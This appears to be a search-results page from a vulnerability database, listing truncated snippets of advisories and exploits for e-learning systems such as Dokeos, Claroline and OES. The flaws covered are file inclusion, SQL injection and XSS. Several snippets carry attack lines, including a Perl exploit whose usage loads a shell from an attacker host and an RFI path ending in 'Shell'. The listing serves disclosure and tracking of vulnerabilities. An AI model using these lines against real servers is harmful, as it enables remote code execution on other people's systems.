757 matches found
DSEGRG-08-31.txt
Digital Security Research Group DSecRG Advisory DSECRG-08-31 Application: Interact E-Learning System Versions Affected: 2.4.1 Vendor URL: http://sourceforge.net/projects/cce-interact Bug: Local File Include Exploits: YES Reported: 03.07.2008 Vendor response: 04.07.2008 Solution: YES Date of Publi...
Interact 2.4.1 - help.php Local File Inclusion
Interact 2.4.1 - help.php Local File Inclusion Digital Security Research Group DSecRG Advisory DSECRG-08-31 Application: Interact E-Learning System Versions Affected: 2.4.1 Vendor URL: http://sourceforge.net/projects/cce-interact Bug: Local File Include Exploits: YES Reported: 03.07.2008 Vendor...
[DSECRG-08-029] Local File Include in Dokeos E-Learning System 1.8.5
Digital Security Research Group DSecRG Advisory DSECRG-08-029 Application: Dokeos E-Learning System Versions Affected: 1.8.5 Vendor URL: http://dokeos.com/ Bug: Local File Include Exploits: YES Reported: 01.07.2008 Vendor response: 05.07.2008 Solution: YES Date of Public Advisory: 17.07.2008...
DSECRG-08-029.txt
Digital Security Research Group DSecRG Advisory DSECRG-08-029 Application: Dokeos E-Learning System Versions Affected: 1.8.5 Vendor URL: http://dokeos.com/ Bug: Local File Include Exploits: YES Reported: 01.07.2008 Vendor response: 05.07.2008 Solution: YES Date of Public Advisory: 17.07.2008...
[DSECRG-08-015] Multiple Security Vulnerabilities in Dokeos 1.8.4
Digital Security Research Group DSecRG Advisory DSECRG-08-015 Application: Dokeos E-Learning System Versions Affected: 1.8.4 Vendor URL: http://dokeos.com Bugs: Multiple SQL Injections,Multiple Blind SQL Injections,Multiple XSS, etc. Exploits: YES Reported: 25.01.2008 Vendor response: 28.01.2008...
DSECRG-08-015.txt
Digital Security Research Group DSecRG Advisory DSECRG-08-015 Application: Dokeos E-Learning System Versions Affected: 1.8.4 Vendor URL: http://dokeos.com Bugs: Multiple SQL Injections,Multiple Blind SQL Injections,Multiple XSS, etc. Exploits: YES Reported: 25.01.2008 Vendor response: 28.01.2008...
Dokeos main/inc/lib/events.lib.inc.php Referer HTTP Header SQL Injection
The remote host is running Dokeos, an open source, e-learning and course management web application written in PHP. The version of Dokeos installed on the remote host fails to sanitize user input to the 'Referer' request header before using it in the 'main/inc/lib/events.lib.inc.php' script to...
efront-312-xss.txt
fuzion / // /\ / / : //\ /| : : .. / \ | | :: :: \ / | | :| || \ / | | || || |\ / | | || || | / | \ | || || | / /\ \ | || || | / / \ -/ -/ | |// \ --/ \ / / / / \ / \/ Product: efront e-learning LMS 3.1.2 http://www.efrontlearning.net/ Vulnerable: http://site/index.php?message=xss...
[HSC] Dokeos Multiple Cross-Site Scripting Vulnerabilities
HSC Dokeos Multiple Cross-Site Scripting Vulnerabilities Dokeos is a learning management system used to manage e-learning. It's prone to cross-site scripting vulnerability. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the...
JVN#79295963 NetCommons cross-site scripting vulnerability
NetCommons from the NetCommons Project is an open source content management system which provides e-learning and groupware functions. NetCommons contains a cross-site scripting vulnerability. This vulnerability is different from JVN51301450. Impact An attacker could execute an arbitrary script on...
claroline <= Multiple Remote File Include Vulnerablitiy
claroline = Multiple Remote File Include Vulnerablitiy D.Script: http://www.e-learningone.it/softwarefree/e-learning/claroline175.zip Discovered by: MoHaNdKo-=-=- [email protected] Homepage: http://www.MoHaNdKo.cOm Exploit:Path/claroline/inc/lib/rootSys=Shell Greetz To: Tryag-Team & AsbMay's Gro...
claroline-rfi.txt
claroline [email protected] Homepage: http://www.MoHaNdKo.cOm Exploit:Path/claroline/inc/lib/rootSys=Shell Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm Greetz To: mY Love Dr.hacker BiG seso...
OES (Open Educational System) 0.1beta Remote File Inclusion Vuln
No description provided by source. \ /\ / | \ | / // / | | \ \ Y / | / / \ /\| /\ / / / / / .OR.ID ECHOADV69$2007 ----------------------------------------------------------------------------------------- ECHOADV69$2007 OES Open Educational System 0.1beta Remote File Inclusion Vulnerability...
[ECHO_ADV_69$2007] OES (Open Educational System) 0.1beta Remote File Inclusion Vulnerability
----------------------------------------------------------------------------------------- ECHOADV69$2007 OES Open Educational System 0.1beta Remote File Inclusion Vulnerability ----------------------------------------------------------------------------------------- Author : M.Hasran Addahroni Da...
OES (Open Educational System) 0.1beta - Remote File Inclusion
OES Open Educational System 0.1beta - Remote File Inclusion \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV69$2007 ----------------------------------------------------------------------------------------- ECHOADV69$2007 OES Open Educational System 0.1beta...
OES (Open Educational System) 0.1beta Remote File Inclusion Vuln
Exploit for unknown platform in category web applications ================================================================ OES Open Educational System 0.1beta Remote File Inclusion Vuln ================================================================ \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | ...
Claroline Software Detection
The remote host is running Claroline, an open source, web-based, collaborative learning environment written in PHP. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid22409; scriptversion"1.17"; scriptsetattributeattribute:"pluginmodificationdate", value:"2022/06/01";...
Claroline Open Source e-Learning 1.7.5 Remote File Include
Description Vendor: http://www.claroline.net The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable clarolineRepositorySys in a include function without being declared. There are other files vulnerable in the same folder, this exploit only attacks ldap.inc.php There is other...
Claroline E-Learning 1.75 - 'ldap.inc.php' Remote File Inclusion
!/usr/bin/perl Claroline Open Source e-Learning 1.7.5 Remote File Include Exploit & Advisorie: beford uso: perl own.pl perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://www.claroline.net The file...
Claroline e-Learning 1.75 (ldap.inc.php) Remote File Inclusion Exploit
Exploit for unknown platform in category web applications ====================================================================== Claroline e-Learning 1.75 ldap.inc.php Remote File Inclusion Exploit ====================================================================== !/usr/bin/perl Claroline Ope...